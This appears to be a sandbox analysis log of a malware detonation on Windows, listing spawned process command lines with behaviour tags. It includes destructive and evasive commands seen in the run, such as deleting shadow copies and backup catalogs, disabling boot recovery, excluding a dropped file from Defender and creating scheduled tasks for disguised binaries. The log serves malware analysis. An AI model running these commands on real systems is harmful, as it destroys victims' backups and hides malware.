C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7412 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8108 /prefetch:16⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2464 -ip 24641⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 700 -p 3240 -ip 32401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3124 -ip 31241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3388 -ip 33881⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2920 -ip 29201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 6768 -ip 67681⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 809CECF89034B1ACBD923A2A21C66C96 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D8088BDC83AEEF372CDD1DC0A5EAF1B7 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 96417E2AB0A7878E51AEA9B9F0B0C6302⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6723EB252835405500FBE5BEF9CC1D9F C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 68DB5BC99D6128523E66756F619FCBB2 C2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff9f67adec0,0x7ff9f67aded0,0x7ff9f67adee05⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2120 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2436 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2568 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=2180 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=2168 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3188 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=3504 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=3220 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=3212 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=2032 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,16758267539326690555,15529419871842691969,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw508_570764036" --mojo-platform-channel-handle=2744 /prefetch:85⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_F049.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6656 -ip 66561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 7320 -ip 73201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 6732 -ip 67321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\CD63.exeC:\Users\Admin\AppData\Local\Temp\CD63.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6284 -ip 62841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 6540 -ip 65401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 256 -ip 2561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3432 -ip 34321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 6808 -ip 68081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\EBD9.exeC:\Users\Admin\AppData\Local\Temp\EBD9.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 2562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\2B92.exeC:\Users\Admin\AppData\Local\Temp\2B92.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5552 -ip 55521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 1304 -ip 13041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 680 -p 5316 -ip 53161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\46FB.exeC:\Users\Admin\AppData\Local\Temp\46FB.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-U7HHT.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-U7HHT.tmp\ultramediaburner.tmp" /SL5="$2041E,281924,62464,C:\Program Files\Uninstall Information\YKIFPSDJBJ\ultramediaburner.exe" /VERYSILENT1⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 6188 -ip 61881⤵
-
C:\Users\Admin\AppData\Local\Temp\705E.exeC:\Users\Admin\AppData\Local\Temp\705E.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7F53.exeC:\Users\Admin\AppData\Local\Temp\7F53.exe1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 772 -p 7660 -ip 76601⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 7352 -ip 73521⤵
-
C:\Users\Admin\AppData\Local\Temp\A79C.exeC:\Users\Admin\AppData\Local\Temp\A79C.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\e1d68de3-7a9f-4011-8ff0-ac8c54857507\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e1d68de3-7a9f-4011-8ff0-ac8c54857507\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e1d68de3-7a9f-4011-8ff0-ac8c54857507\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e1d68de3-7a9f-4011-8ff0-ac8c54857507\test.bat"3⤵
-
C:\Users\Admin\AppData\Local\Temp\A79C.exeC:\Users\Admin\AppData\Local\Temp\A79C.exe2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\A79C.exe" -Force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 2076 -ip 20761⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{24a36a48-5dde-354b-ba2e-2854b8321529}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "a49f"2⤵
-
C:\Users\Admin\AppData\Local\Temp\DEBB.exeC:\Users\Admin\AppData\Local\Temp\DEBB.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E62E.exeC:\Users\Admin\AppData\Local\Temp\E62E.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 2962⤵
- Program crash
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\ED43.exeC:\Users\Admin\AppData\Local\Temp\ED43.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 03⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Users\Admin\AppData\Local\Temp\FCE4.exeC:\Users\Admin\AppData\Local\Temp\FCE4.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im MSBuild.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 856 -p 5384 -ip 53841⤵
-
C:\Users\Admin\AppData\Local\Temp\4604.exeC:\Users\Admin\AppData\Local\Temp\4604.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\u8c2U09Nl2.bat"2⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:24⤵
-
C:\ProgramData\68\fontdrvhost.exe"C:\ProgramData\68\fontdrvhost.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Users\Admin\AppData\Local\Temp\53C1.exeC:\Users\Admin\AppData\Local\Temp\53C1.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 836 -p 3824 -ip 38241⤵
-
C:\Users\Admin\AppData\Local\Temp\6E10.exeC:\Users\Admin\AppData\Local\Temp\6E10.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\6E10.exe"C:\Users\Admin\AppData\Local\Temp\6E10.exe"2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6E10.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\7B40.exeC:\Users\Admin\AppData\Local\Temp\7B40.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 8762⤵
- Program crash
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 888 -p 7620 -ip 76201⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 6200 -ip 62001⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 4603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5824 -ip 58241⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "GgR9orYdkoaFoTnYbO8e9_1e" /sc ONLOGON /tr "'C:\Users\Admin\Documents\Recently\GgR9orYdkoaFoTnYbO8e9_1e.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\ProgramData\68\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\WindowsShell\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SHabinuliju" /sc ONLOGON /tr "'C:\ProgramData\ssh\SHabinuliju.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\notepad\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
